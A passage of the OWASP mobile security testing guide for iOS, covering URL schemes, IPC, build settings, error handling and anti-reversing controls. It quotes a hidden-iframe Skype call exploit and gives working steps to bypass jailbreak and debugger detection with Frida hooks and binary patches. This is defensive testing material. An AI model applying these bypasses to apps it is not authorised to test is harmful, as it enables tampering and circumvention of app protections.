<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n...\n <key>com.apple.security.application-groups</key>\n <array>\n <string>group.ph.telegra.Telegraph</string>\n </array>\n</dict>\n...\n</plist>\n
The entitlement outlined above does not require any additional permissions from the user. However, it is always a good practice to check all entitlements, as the app might overask the user in terms of permissions and thereby leak information.
As documented at Apple Developer Documentation, the App Groups entitlement is required to share information between different apps through IPC or a shared file container, which means that data can be shared on the device directly between the apps. This entitlement is also required if an app extension requires to share information with its containing app.
Depending on the data to be shared, it might be more appropriate to share it using another method such as through a backend where this data could be potentially verified, avoiding tampering by e.g. the user themselves.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#inter-process-communication-ipc","title":"Inter-Process Communication (IPC)","text":"During implementation of a mobile application, developers may apply traditional techniques for IPC (such as using shared files or network sockets). The IPC system functionality offered by mobile application platforms should be used because it is much more mature than traditional techniques. Using IPC mechanisms with no security in mind may cause the application to leak or expose sensitive data.
In contrast to Android's rich Inter-Process Communication (IPC) capability, iOS offers some rather limited options for communication between apps. In fact, there's no way for apps to communicate directly. In this section we will present the different types of indirect communication offered by iOS and how to test them. Here's an overview:
Custom URL schemes allow apps to communicate via a custom protocol. An app must declare support for the schemes and handle incoming URLs that use those schemes.
Apple warns about the improper use of custom URL schemes in the Apple Developer Documentation:
URL schemes offer a potential attack vector into your app, so make sure to validate all URL parameters and discard any malformed URLs. In addition, limit the available actions to those that do not risk the user\u2019s data. For example, do not allow other apps to directly delete content or access sensitive information about the user. When testing your URL-handling code, make sure your test cases include improperly formatted URLs.
They also suggest using universal links instead, if the purpose is to implement deep linking:
While custom URL schemes are an acceptable form of deep linking, universal links are strongly recommended as a best practice.
Supporting a custom URL scheme is done by:
Security issues arise when an app processes calls to its URL scheme without properly validating the URL and its parameters and when users aren't prompted for confirmation before triggering an important action.
One example is the following bug in the Skype Mobile app, discovered in 2010: The Skype app registered the skype://
protocol handler, which allowed other apps to trigger calls to other Skype users and phone numbers. Unfortunately, Skype didn't ask users for permission before placing the calls, so any app could call arbitrary numbers without the user's knowledge. Attackers exploited this vulnerability by putting an invisible <iframe src=\"skype://xxx?call\"></iframe>
(where xxx
was replaced by a premium number), so any Skype user who inadvertently visited a malicious website called the premium number.
As a developer, you should carefully validate any URL before calling it. You can allow only certain applications which may be opened via the registered protocol handler. Prompting users to confirm the URL-invoked action is another helpful control.
All URLs are passed to the app delegate, either at launch time or while the app is running or in the background. To handle incoming URLs, the delegate should implement methods to:
More information can be found in the archived App Programming Guide for iOS and in the Apple Secure Coding Guide.
In addition, an app may also want to send URL requests (aka. queries) to other apps. This is done by:
Universal links are the iOS equivalent to Android App Links (aka. Digital Asset Links) and are used for deep linking. When tapping a universal link (to the app's website), the user will seamlessly be redirected to the corresponding installed app without going through Safari. If the app isn\u2019t installed, the link will open in Safari.
Universal links are standard web links (HTTP/HTTPS) and are not to be confused with custom URL schemes, which originally were also used for deep linking.
For example, the Telegram app supports both custom URL schemes and universal links:
tg://resolve?domain=fridadotre
is a custom URL scheme and uses the tg://
scheme.https://telegram.me/fridadotre
is a universal link and uses the https://
scheme.Both result in the same action, the user will be redirected to the specified chat in Telegram (\"fridadotre\" in this case). However, universal links give several key benefits that are not applicable when using custom URL schemes and are the recommended way to implement deep linking, according to the Apple Developer Documentation. Specifically, universal links are:
You can learn more about Universal Links in the post \"Learning about Universal Links and Fuzzing URL Schemes on iOS with Frida\" by Carlos Holguera.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#uiactivity-sharing","title":"UIActivity Sharing","text":"Starting on iOS 6 it is possible for third-party apps to share data (items) via specific mechanisms like AirDrop, for example. From a user perspective, this feature is the well-known system-wide \"Share Activity Sheet\" that appears after clicking on the \"Share\" button.
The available built-in sharing mechanisms (aka. Activity Types) include:
A full list can be found in UIActivity.ActivityType. If not considered appropriate for the app, the developers have the possibility to exclude some of these sharing mechanisms.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#app-extensions","title":"App extensions","text":"Together with iOS 8, Apple introduced App Extensions. According to Apple App Extension Programming Guide, app extensions let apps offer custom functionality and content to users while they\u2019re interacting with other apps or the system. In order to do this, they implement specific, well scoped tasks like, for example, define what happens after the user clicks on the \"Share\" button and selects some app or action, provide the content for a Today widget or enable a custom keyboard.
Depending on the task, the app extension will have a particular type (and only one), the so-called extension points. Some notable ones are:
There are three important elements here:
For example, the user selects text in the host app, clicks on the "Share" button and selects one "app" or action from the list. This triggers the app extension of the containing app. The app extension displays its view within the context of the host app and uses the items provided by the host app, the selected text in this case, to perform a specific task (post it on a social network, for example). See this picture from the Apple App Extension Programming Guide which summarizes this pretty well:
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#security-considerations","title":"Security Considerations","text":"From the security point of view it is important to note that:
openURL:completionHandler:
method of the NSExtensionContext
class.In addition:
When typing data into input fields, the clipboard can be used to copy in data. The clipboard is accessible system-wide and is therefore shared by apps. This sharing can be misused by malicious apps to get sensitive data that has been stored in the clipboard.
When using an app you should be aware that other apps might be reading the clipboard continuously, as the Facebook app did. Before iOS 9, a malicious app might monitor the pasteboard in the background while periodically retrieving [UIPasteboard generalPasteboard].string
. As of iOS 9, pasteboard content is accessible to apps in the foreground only, which reduces the attack surface of password sniffing from the clipboard dramatically. Still, copy-pasting passwords is a security risk you should be aware of, but also cannot be solved by an app.
The UIPasteboard
enables sharing data within an app, and from an app to other apps. There are two kinds of pasteboards:
Security Considerations:
Code signing your app assures users that the app has a known source and hasn't been modified since it was last signed. Before your app can integrate app services, be installed on a non-jailbroken device, or be submitted to the App Store, it must be signed with a certificate issued by Apple. For more information on how to request certificates and code sign your apps, review the App Distribution Guide.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#third-party-libraries","title":"Third-Party Libraries","text":"iOS applications often make use of third party libraries which accelerate development as the developer has to write less code in order to solve a problem. However, third party libraries may contain vulnerabilities, incompatible licensing, or malicious content. Additionally, it is difficult for organizations and developers to manage application dependencies, including monitoring library releases and applying available security patches.
There are three widely used package management tools Swift Package Manager, Carthage, and CocoaPods:
There are two categories of libraries:
OHHTTPStubs
used for testing.Alamofire
.These libraries can lead to unwanted side-effects:
AFNetworking
version 2.5.1, which contained a bug that disabled certificate validation. This vulnerability would allow attackers to execute man-in-the-middle attacks against apps that are using the library to connect to their APIs.Please note that this issue can hold on multiple levels: When you use webviews with JavaScript running in the webview, the JavaScript libraries can have these issues as well. The same holds for plugins/libraries for Cordova, React-native and Xamarin apps.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#memory-corruption-bugs","title":"Memory Corruption Bugs","text":"iOS applications have various ways to run into memory corruption bugs: first there are the native code issues which have been mentioned in the general Memory Corruption Bugs section. Next, there are various unsafe operations with both Objective-C and Swift to actually wrap around native code which can create issues. Last, both Swift and Objective-C implementations can result in memory leaks due to retaining objects which are no longer in use.
Learn more:
Detecting the presence of binary protection mechanisms heavily depends on the language used for developing the application.
Although Xcode enables all binary security features by default, it may be relevant to verify this for old applications or to check for compiler flag misconfigurations. The following features are applicable:
MH_EXECUTE
).MH_DYLIB
).Learn more:
Tests to detect the presence of these protection mechanisms heavily depend on the language used for developing the application. For example, existing techniques for detecting the presence of stack canaries do not work for pure Swift apps.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#xcode-project-settings","title":"Xcode Project Settings","text":""},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#stack-canary-protection","title":"Stack Canary protection","text":"Steps for enabling stack canary protection in an iOS application:
Steps for building an iOS application as PIE:
ARC is automatically enabled for Swift apps by the swiftc
compiler. However, for Objective-C apps you'll have ensure that it's enabled by following these steps:
See the Technical Q&A QA1788 Building a Position Independent Executable.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#debuggable-apps","title":"Debuggable Apps","text":"Apps can be made debuggable by adding the get-task-allow
key to the app entitlements file and setting it to true
.
While debugging is a useful feature when developing an app, it has to be turned off before releasing apps to the App Store or within an enterprise program. To do that you need to determine the mode in which your app is to be generated to check the flags in the environment:
As a good practice, as little explanatory information as possible should be provided with a compiled binary. The presence of additional metadata such as debug symbols might provide valuable information about the code, e.g. function names leaking information about what a function does. This metadata is not required to execute the binary and thus it is safe to discard it for the release build, which can be done by using proper compiler configurations. As a tester you should inspect all binaries delivered with the app and ensure that no debugging symbols are present (at least those revealing any valuable information about the code).
When an iOS application is compiled, the compiler generates a list of debug symbols for each binary file in an app (the main app executable, frameworks, and app extensions). These symbols include class names, global variables, and method and function names which are mapped to specific files and line numbers where they're defined. Debug builds of an app place the debug symbols in a compiled binary by default, while release builds of an app place them in a companion Debug Symbol file (dSYM) to reduce the size of the distributed app.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#debugging-code-and-error-logging","title":"Debugging Code and Error Logging","text":"To speed up verification and get a better understanding of errors, developers often include debugging code, such as verbose logging statements (using NSLog
, println
, print
, dump
, and debugPrint
) about responses from their APIs and about their application's progress and/or state. Furthermore, there may be debugging code for \"management-functionality\", which is used by developers to set the application's state or mock responses from an API. Reverse engineers can easily use this information to track what's happening with the application. Therefore, debugging code should be removed from the application's release version.
Exceptions often occur after an application enters an abnormal or erroneous state. Testing exception handling is about making sure that the application will handle the exception and get into a safe state without exposing any sensitive information via its logging mechanisms or the UI.
Bear in mind that exception handling in Objective-C is quite different from exception handling in Swift. Bridging the two approaches in an application that is written in both legacy Objective-C code and Swift code can be problematic.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#exception-handling-in-objective-c","title":"Exception Handling in Objective-C","text":"Objective-C has two types of errors:
NSException:
NSException
is used to handle programming and low-level errors (e.g., division by 0 and out-of-bounds array access). An NSException
can either be raised by raise
or thrown with @throw
. Unless caught, this exception will invoke the unhandled exception handler, with which you can log the statement (logging will halt the program). @catch
allows you to recover from the exception if you're using a @try
-@catch
-block:
@try {\n //do work here\n }\n\n@catch (NSException *e) {\n //recover from exception\n}\n\n@finally {\n //cleanup\n
Bear in mind that using NSException
comes with memory management pitfalls: you need to clean up allocations from the try block that are in the finally block. Note that you can promote NSException
objects to NSError
by instantiating an NSError
in the @catch
block.
NSError:
NSError
is used for all other types of errors. Some Cocoa framework APIs provide errors as objects in their failure callback in case something goes wrong; those that don't provide them pass a pointer to an NSError
object by reference. It is a good practice to provide a BOOL
return type to the method that takes a pointer to an NSError
object to indicate success or failure. If there's a return type, make sure to return nil
for errors. If NO
or nil
is returned, it allows you to inspect the error/reason for failure.
Exception handing in Swift (2 - 5) is quite different. The try-catch block is not there to handle NSException
. The block is used to handle errors that conform to the Error
(Swift 3) or ErrorType
(Swift 2) protocol. This can be challenging when Objective-C and Swift code are combined in an application. Therefore, NSError
is preferable to NSException
for programs written in both languages. Furthermore, error-handling is opt-in in Objective-C, but throws
must be explicitly handled in Swift. To convert error-throwing, look at the Apple documentation. Methods that can throw errors use the throws
keyword. The Result
type represents a success or failure, see Result, How to use Result in Swift 5 and The power of Result types in Swift. There are four ways to handle errors in Swift:
do-catch
; there's only a throw
throwing the actual error or a try
to execute the method that throws. The method containing the try
also requires the throws
keyword:func dosomething(argumentx:TypeX) throws {\n try functionThatThrows(argumentx: argumentx)\n}\n
do-catch
statement. You can use the following pattern:func doTryExample() {\n do {\n try functionThatThrows(number: 203)\n } catch NumberError.lessThanZero {\n // Handle number is less than zero\n } catch let NumberError.tooLarge(delta) {\n // Handle number is too large (with delta value)\n } catch {\n // Handle any other errors\n }\n}\n\nenum NumberError: Error {\n case lessThanZero\n case tooLarge(Int)\n case tooSmall(Int)\n}\n\nfunc functionThatThrows(number: Int) throws -> Bool {\n if number < 0 {\n throw NumberError.lessThanZero\n } else if number < 10 {\n throw NumberError.tooSmall(10 - number)\n } else if number > 100 {\n throw NumberError.tooLarge(100 - number)\n } else {\n return true\n }\n}\n
let x = try? functionThatThrows()\n // In this case the value of x is nil in case of an error.\n
try!
expression to assert that the error won't occur.Result
return:enum ErrorType: Error {\n case typeOne\n case typeTwo\n}\n\nfunc functionWithResult(param: String?) -> Result<String, ErrorType> {\n guard let value = param else {\n return .failure(.typeOne)\n }\n return .success(value)\n}\n\nfunc callResultFunction() {\n let result = functionWithResult(param: \"OWASP\")\n\n switch result {\n case let .success(value):\n // Handle success\n case let .failure(error):\n // Handle failure (with error)\n }\n}\n
Result
type:struct MSTG: Codable {\n var root: String\n var plugins: [String]\n var structure: MSTGStructure\n var title: String\n var language: String\n var description: String\n}\n\nstruct MSTGStructure: Codable {\n var readme: String\n}\n\nenum RequestError: Error {\n case requestError(Error)\n case noData\n case jsonError\n}\n\nfunc getMSTGInfo() {\n guard let url = URL(string: \"https://raw.githubusercontent.com/OWASP/owasp-mastg/master/book.json\") else {\n return\n }\n\n request(url: url) { result in\n switch result {\n case let .success(data):\n // Handle success with MSTG data\n let mstgTitle = data.title\n let mstgDescription = data.description\n case let .failure(error):\n // Handle failure\n switch error {\n case let .requestError(error):\n // Handle request error (with error)\n case .noData:\n // Handle no data received in response\n case .jsonError:\n // Handle error parsing JSON\n }\n }\n }\n}\n\nfunc request(url: URL, completion: @escaping (Result<MSTG, RequestError>) -> Void) {\n let task = URLSession.shared.dataTask(with: url) { data, _, error in\n if let error = error {\n return completion(.failure(.requestError(error)))\n } else {\n if let data = data {\n let decoder = JSONDecoder()\n guard let response = try? decoder.decode(MSTG.self, from: data) else {\n return completion(.failure(.jsonError))\n }\n return completion(.success(response))\n }\n }\n }\n task.resume()\n}\n
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/","title":"iOS Anti-Reversing Defenses","text":""},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#overview","title":"Overview","text":"This chapter covers defense-in-depth measures recommended for apps that process, or give access to, sensitive data or functionality. Research shows that many App Store apps often include these measures.
These measures should be applied as needed, based on an assessment of the risks caused by unauthorized tampering with the app and/or reverse engineering of the code.
You can learn more about principles and technical risks of reverse engineering and code modification in these OWASP documents:
The lack of any of these measures does not cause a vulnerability - instead, they are meant to increase the app's resilience against reverse engineering and specific client-side attacks.
None of these measures can assure 100% effectiveness, as the reverse engineer will always have full access to the device and will therefore always win (given enough time and resources)!
For example, preventing debugging is virtually impossible. If the app is publicly available, it can be run on an untrusted device that is under full control of the attacker. A very determined attacker will eventually manage to bypass all the app's anti-debugging controls by patching the app binary or by dynamically modifying the app's behavior at runtime with tools such as Frida.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#jailbreak-detection","title":"Jailbreak Detection","text":"Jailbreak detection mechanisms are added to reverse engineering defense to make running the app on a jailbroken device more difficult. This blocks some of the tools and techniques reverse engineers like to use. Like most other types of defense, jailbreak detection is not very effective by itself, but scattering checks throughout the app's source code can improve the effectiveness of the overall anti-tampering scheme.
You can learn more about Jailbreak/Root Detection in the research study \"Jailbreak/Root Detection Evasion Study on iOS and Android\" by Dana Geist and Marat Nigmatullin.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#common-jailbreak-detection-checks","title":"Common Jailbreak Detection Checks","text":"Here we present three typical jailbreak detection techniques:
File-based Checks:
The app might be checking for files and directories typically associated with jailbreaks, such as:
/Applications/Cydia.app\n/Applications/FakeCarrier.app\n/Applications/Icy.app\n/Applications/IntelliScreen.app\n/Applications/MxTube.app\n/Applications/RockApp.app\n/Applications/SBSettings.app\n/Applications/WinterBoard.app\n/Applications/blackra1n.app\n/Library/MobileSubstrate/DynamicLibraries/LiveClock.plist\n/Library/MobileSubstrate/DynamicLibraries/Veency.plist\n/Library/MobileSubstrate/MobileSubstrate.dylib\n/System/Library/LaunchDaemons/com.ikey.bbot.plist\n/System/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist\n/bin/bash\n/bin/sh\n/etc/apt\n/etc/ssh/sshd_config\n/private/var/lib/apt\n/private/var/lib/cydia\n/private/var/mobile/Library/SBSettings/Themes\n/private/var/stash\n/private/var/tmp/cydia.log\n/var/tmp/cydia.log\n/usr/bin/sshd\n/usr/libexec/sftp-server\n/usr/libexec/ssh-keysign\n/usr/sbin/sshd\n/var/cache/apt\n/var/lib/apt\n/var/lib/cydia\n/usr/sbin/frida-server\n/usr/bin/cycript\n/usr/local/bin/cycript\n/usr/lib/libcycript.dylib\n/var/log/syslog\n
Checking File Permissions:
The app might be trying to write to a location that's outside the application's sandbox. For instance, it may attempt to create a file in, for example, the /private
directory. If the file is created successfully, the app can assume that the device has been jailbroken.
do {\n let pathToFileInRestrictedDirectory = \"/private/jailbreak.txt\"\n try \"This is a test.\".write(toFile: pathToFileInRestrictedDirectory, atomically: true, encoding: String.Encoding.utf8)\n try FileManager.default.removeItem(atPath: pathToFileInRestrictedDirectory)\n // Device is jailbroken\n} catch {\n // Device is not jailbroken\n}\n
Checking Protocol Handlers:
The app might be attempting to call well-known protocol handlers such as cydia://
(available by default after installing Cydia).
if let url = URL(string: \"cydia://package/com.example.package\"), UIApplication.shared.canOpenURL(url) {\n // Device is jailbroken\n}\n
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#automated-jailbreak-detection-bypass","title":"Automated Jailbreak Detection Bypass","text":"The quickest way to bypass common Jailbreak detection mechanisms is objection. You can find the implementation of the jailbreak bypass in the jailbreak.ts script.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#manual-jailbreak-detection-bypass","title":"Manual Jailbreak Detection Bypass","text":"If the automated bypasses aren't effective you need to get your hands dirty and reverse engineer the app binaries until you find the pieces of code responsible for the detection and either patch them statically or apply runtime hooks to disable them.
Step 1: Reverse Engineering:
When you need to reverse engineer a binary looking for jailbreak detection, the most obvious way is to search for known strings, such as \"jail\" or \"jailbreak\". Note that this won't always be effective, especially when resilience measures are in place or simply when the developer has avoided such obvious terms.
Example: Download the Damn Vulnerable iOS application (DVIA-v2), unzip it, load the main binary into radare2 and wait for the analysis to complete.
r2 -A ./DVIA-v2-swift/Payload/DVIA-v2.app/DVIA-v2\n
Now you can list the binary's symbols using the is
command and apply a case-insensitive grep (~+
) for the string \"jail\".
[0x1001a9790]> is~+jail\n...\n2230 0x001949a8 0x1001949a8 GLOBAL FUNC 0 DVIA_v2.JailbreakDetectionViewController.isJailbroken.allocator__Bool\n7792 0x0016d2d8 0x10016d2d8 LOCAL FUNC 0 +[JailbreakDetection isJailbroken]\n...\n
As you can see, there's an instance method with the signature -[JailbreakDetectionVC isJailbroken]
.
Step 2: Dynamic Hooks:
Now you can use Frida to bypass jailbreak detection by performing the so-called early instrumentation, that is, by replacing function implementation right at startup.
Use frida-trace
on your host computer:
frida-trace -U -f /Applications/DamnVulnerableIOSApp.app/DamnVulnerableIOSApp -m \"-[JailbreakDetectionVC isJailbroken]\"\n
This will start the app, trace calls to -[JailbreakDetectionVC isJailbroken]
, and create a JavaScript hook for each matching element. Open ./__handlers__/__JailbreakDetectionVC_isJailbroken_.js
with your favourite editor and edit the onLeave
callback function. You can simply replace the return value using retval.replace()
to always return 0
:
onLeave: function (log, retval, state) {\n console.log(\"Function [JailbreakDetectionVC isJailbroken] originally returned:\"+ retval);\n retval.replace(0); \n console.log(\"Changing the return value to:\"+retval);\n}\n
This will provide the following output:
$ frida-trace -U -f /Applications/DamnVulnerableIOSApp.app/DamnVulnerableIOSApp -m \"-[JailbreakDetectionVC isJailbroken]:\"\n\nInstrumenting functions... `...\n-[JailbreakDetectionVC isJailbroken]: Loaded handler at \"./__handlers__/__JailbreakDetectionVC_isJailbroken_.js\"\nStarted tracing 1 function. Press Ctrl+C to stop.\n\nFunction [JailbreakDetectionVC isJailbroken] originally returned:0x1\nChanging the return value to:0x0\n
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#anti-debugging-detection","title":"Anti-Debugging Detection","text":"Exploring applications using a debugger is a very powerful technique during reversing. You can not only track variables containing sensitive data and modify the control flow of the application, but also read and modify memory and registers.
There are several anti-debugging techniques applicable to iOS which can be categorized as preventive or as reactive. When properly distributed throughout the app, these techniques act as a supportive measure to increase the overall resilience.
As seen in chapter \"Tampering and Reverse Engineering on iOS\", the iOS XNU kernel implements a ptrace
system call that's lacking most of the functionality required to properly debug a process (e.g. it allows attaching/stepping but not read/write of memory and registers).
Nevertheless, the iOS implementation of the ptrace
syscall contains a nonstandard and very useful feature: preventing the debugging of processes. This feature is implemented as the PT_DENY_ATTACH
request, as described in the official BSD System Calls Manual. In simple words, it ensures that no other debugger can attach to the calling process; if a debugger attempts to attach, the process will terminate. Using PT_DENY_ATTACH
is a fairly well-known anti-debugging technique, so you may encounter it often during iOS pentests.
Before diving into the details, it is important to know that ptrace
is not part of the public iOS API. Non-public APIs are prohibited, and the App Store may reject apps that include them. Because of this, ptrace
is not directly called in the code; it's called when a ptrace
function pointer is obtained via dlsym
.
The following is an example implementation of the above logic:
#import <dlfcn.h>\n#import <sys/types.h>\n#import <stdio.h>\ntypedef int (*ptrace_ptr_t)(int _request, pid_t _pid, caddr_t _addr, int _data);\nvoid anti_debug() {\n ptrace_ptr_t ptrace_ptr = (ptrace_ptr_t)dlsym(RTLD_SELF, \"ptrace\");\n ptrace_ptr(31, 0, 0, 0); // PTRACE_DENY_ATTACH = 31\n}\n
Bypass: To demonstrate how to bypass this technique we'll use an example of a disassembled binary that implements this approach:
Let's break down what's happening in the binary. dlsym
is called with ptrace
as the second argument (register R1). The return value in register R0 is moved to register R6 at offset 0x1908A. At offset 0x19098, the pointer value in register R6 is called using the BLX R6 instruction. To disable the ptrace
call, we need to replace the instruction BLX R6
(0xB0 0x47
in Little Endian) with the NOP
(0x00 0xBF
in Little Endian) instruction. After patching, the code will be similar to the following:
Armconverter.com is a handy tool for conversion between bytecode and instruction mnemonics.
Bypasses for other ptrace-based anti-debugging techniques can be found in \"Defeating Anti-Debug Techniques: macOS ptrace variants\" by Alexander O'Mara.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#using-sysctl","title":"Using sysctl","text":"Another approach to detecting a debugger that's attached to the calling process involves sysctl
. According to the Apple documentation, it allows processes to set system information (if having the appropriate privileges) or simply to retrieve system information (such as whether or not the process is being debugged). However, note that just the fact that an app uses sysctl
might be an indicator of anti-debugging controls, though this won't always be the case.
The Apple Documentation Archive includes an example which checks the info.kp_proc.p_flag
flag returned by the call to sysctl
with the appropriate parameters. According to Apple, you shouldn't use this code unless it's for the debug build of your program.
Bypass: One way to bypass this check is by patching the binary. When the code above is compiled, the disassembled version of the second half of the code is similar to the following:
After the instruction at offset 0xC13C, MOVNE R0, #1
is patched and changed to MOVNE R0, #0
(0x00 0x20 in bytecode), the patched code is similar to the following:
You can also bypass a sysctl
check by using the debugger itself and setting a breakpoint at the call to sysctl
. This approach is demonstrated in iOS Anti-Debugging Protections #2.
Applications on iOS can detect if they have been started by a debugger by checking their parent PID. Normally, an application is started by the launchd process, which is the first process running in the user mode and has PID=1. However, if a debugger starts an application, we can observe that getppid
returns a PID different than 1
. This detection technique can be implemented in native code (via syscalls), using Objective-C or Swift as shown here:
func AmIBeingDebugged() -> Bool {\n return getppid() != 1\n}\n
Bypass: Similarly to the other techniques, this also has a trivial bypass (e.g. by patching the binary or by using Frida hooks).
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#file-integrity-checks","title":"File Integrity Checks","text":"There are two common approaches to check file integrity: using application source code integrity checks and using file storage integrity checks.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#application-source-code-integrity-checks","title":"Application Source Code Integrity Checks","text":"In the \"Tampering and Reverse Engineering on iOS\" chapter, we discussed the iOS IPA application signature check. We also saw that determined reverse engineers can bypass this check by re-packaging and re-signing an app using a developer or enterprise certificate. One way to make this harder is to add a custom check that determines whether the signatures still match at runtime.
Apple takes care of integrity checks with DRM. However, additional controls (such as in the example below) are possible. The mach_header
is parsed to calculate the start of the instruction data, which is used to generate the signature. Next, the signature is compared to the given signature. Make sure that the generated signature is stored or coded somewhere else.
int xyz(char *dst) {\n const struct mach_header * header;\n Dl_info dlinfo;\n\n if (dladdr(xyz, &dlinfo) == 0 || dlinfo.dli_fbase == NULL) {\n NSLog(@\" Error: Could not resolve symbol xyz\");\n [NSThread exit];\n }\n\n while(1) {\n\n header = dlinfo.dli_fbase; // Pointer on the Mach-O header\n struct load_command * cmd = (struct load_command *)(header + 1); // First load command\n // Now iterate through load command\n //to find __text section of __TEXT segment\n for (uint32_t i = 0; cmd != NULL && i < header->ncmds; i++) {\n if (cmd->cmd == LC_SEGMENT) {\n // __TEXT load command is a LC_SEGMENT load command\n struct segment_command * segment = (struct segment_command *)cmd;\n if (!strcmp(segment->segname, \"__TEXT\")) {\n // Stop on __TEXT segment load command and go through sections\n // to find __text section\n struct section * section = (struct section *)(segment + 1);\n for (uint32_t j = 0; section != NULL && j < segment->nsects; j++) {\n if (!strcmp(section->sectname, \"__text\"))\n break; //Stop on __text section load command\n section = (struct section *)(section + 1);\n }\n // Get here the __text section address, the __text section size\n // and the virtual memory address so we can calculate\n // a pointer on the __text section\n uint32_t * textSectionAddr = (uint32_t *)section->addr;\n uint32_t textSectionSize = section->size;\n uint32_t * vmaddr = segment->vmaddr;\n char * textSectionPtr = (char *)((int)header + (int)textSectionAddr - (int)vmaddr);\n // Calculate the signature of the data,\n // store the result in a string\n // and compare to the original one\n unsigned char digest[CC_MD5_DIGEST_LENGTH];\n CC_MD5(textSectionPtr, textSectionSize, digest); // calculate the signature\n for (int i = 0; i < sizeof(digest); i++) // fill signature\n sprintf(dst + (2 * i), \"%02x\", digest[i]);\n\n // return strcmp(originalSignature, signature) == 0; // verify signatures match\n\n return 0;\n }\n }\n cmd = (struct load_command *)((uint8_t *)cmd + 
cmd->cmdsize);\n }\n }\n\n}\n
Bypass:
Apps might choose to ensure the integrity of the application storage itself, by creating an HMAC or signature over either a given key-value pair or a file stored on the device, e.g. in the Keychain, UserDefaults
/NSUserDefaults
, or any database.
For example, an app might contain the following code to generate an HMAC with CommonCrypto
:
// Allocate a buffer to hold the digest and perform the digest.\n NSMutableData* actualData = [getData];\n //get the key from the keychain\n NSData* key = [getKey];\n NSMutableData* digestBuffer = [NSMutableData dataWithLength:CC_SHA256_DIGEST_LENGTH];\n CCHmac(kCCHmacAlgSHA256, [actualData bytes], (CC_LONG)[key length], [actualData bytes], (CC_LONG)[actualData length], [digestBuffer mutableBytes]);\n [actualData appendData: digestBuffer];\n
This script performs the following steps:
NSMutableData
.After that, it might be verifying the HMACs by doing the following:
NSData* hmac = [data subdataWithRange:NSMakeRange(data.length - CC_SHA256_DIGEST_LENGTH, CC_SHA256_DIGEST_LENGTH)];\n NSData* actualData = [data subdataWithRange:NSMakeRange(0, (data.length - hmac.length))];\n NSMutableData* digestBuffer = [NSMutableData dataWithLength:CC_SHA256_DIGEST_LENGTH];\n CCHmac(kCCHmacAlgSHA256, [actualData bytes], (CC_LONG)[key length], [actualData bytes], (CC_LONG)[actualData length], [digestBuffer mutableBytes]);\n return [hmac isEqual: digestBuffer];\n
NSData
.NSData
.Note: if the app also encrypts files, make sure that it encrypts and then calculates the HMAC as described in Authenticated Encryption.
Bypass:
The presence of tools, frameworks and apps commonly used by reverse engineers may indicate an attempt to reverse engineer the app. Some of these tools can only run on a jailbroken device, while others force the app into debugging mode or depend on starting a background service on the mobile phone. Therefore, there are different ways that an app may implement to detect a reverse engineering attack and react to it, e.g. by terminating itself.
You can detect popular reverse engineering tools that have been installed in an unmodified form by looking for associated application packages, files, processes, or other tool-specific modifications and artifacts. In the following examples, we'll discuss different ways to detect the Frida instrumentation framework, which is used extensively in this guide and also in the real world. Other tools, such as Cydia Substrate or Cycript, can be detected similarly. Note that injection, hooking and DBI (Dynamic Binary Instrumentation) tools can often be detected implicitly, through runtime integrity checks, which are discussed below.
Bypass:
The following steps should guide you when bypassing detection of reverse engineering tools:
Refer to the chapter \"Tampering and Reverse Engineering on iOS\" for examples of patching and code injection.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#frida-detection","title":"Frida Detection","text":"Frida runs under the name of frida-server in its default configuration (injected mode) on a jailbroken device. When you explicitly attach to a target app (e.g. via frida-trace or the Frida CLI), Frida injects a frida-agent into the memory of the app. Therefore, you may expect to find it there after attaching to the app (and not before). On Android, verifying this is pretty straightforward as you can simply grep for the string \"frida\" in the memory maps of the process ID in the proc
directory (/proc/<pid>/maps
). However, on iOS the proc
directory is not available, but you can list the loaded dynamic libraries in an app with the function _dyld_image_count
.
Frida may also run in the so-called embedded mode, which also works for non-jailbroken devices. It consists of embedding a frida-gadget into the IPA and forcing the app to load it as one of its native libraries.
The application's static content, including its ARM-compiled binary and its external libraries, is stored inside the <Application>.app
directory. If you inspect the content of the /var/containers/Bundle/Application/<UUID>/<Application>.app
directory, you'll find the embedded frida-gadget as FridaGadget.dylib.
